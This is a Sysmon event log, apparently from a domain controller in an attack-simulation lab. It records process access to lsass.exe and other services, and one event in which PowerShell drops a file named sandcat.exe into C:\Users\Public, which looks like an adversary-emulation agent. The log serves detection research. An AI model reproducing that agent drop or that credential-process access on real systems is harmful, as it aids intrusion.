15:51:05.519{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001026Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:05.519{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001025Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:05.441{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001024Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:05.441{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001023Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:05.441{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001022Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:05.425{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001021Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:05.425{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001020Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:05.425{D28789B6-7C62-5FA1-0B00-000000008801}8681116C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000001019Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localEXE2020-11-03 15:51:05.003{D28789B6-7C64-5FA1-1A00-000000008801}2164C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Public\sandcat.exe2020-11-03 15:51:05.003 10341000x80000000000000001018Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:04.597{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001017Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:04.597{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001016Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:04.597{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001015Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:04.597{D28789B6-7C62-5FA1-0B00-000000008801}8681116C:\Windows\system32\lsass.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001014Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:04.597{D28789B6-7C62-5FA1-0B00-000000008801}8681116C:\Windows\system32\lsass.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001013Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:04.566{D28789B6-7C64-5FA1-1000-000000008801}11442392C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+b920|C:\Windows\system32\wbem\wbemcore.dll+255ff|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+2685b|C:\Windows\system32\wbem\wbemcore.dll+22b78|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001012Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:04.550{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001011Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:04.550{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001010Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:04.550{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001009Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:04.535{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001008Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:04.535{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001007Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:04.535{D28789B6-7C62-5FA1-0B00-000000008801}8681116C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001006Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:04.535{D28789B6-7C62-5FA1-0B00-000000008801}8681116C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001005Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:04.535{D28789B6-7C62-5FA1-0B00-000000008801}8681116C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001004Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:04.425{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1900-000000008801}2152C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001003Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:04.191{D28789B6-7C62-5FA1-0B00-000000008801}868900C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1900-000000008801}2152C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001002Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 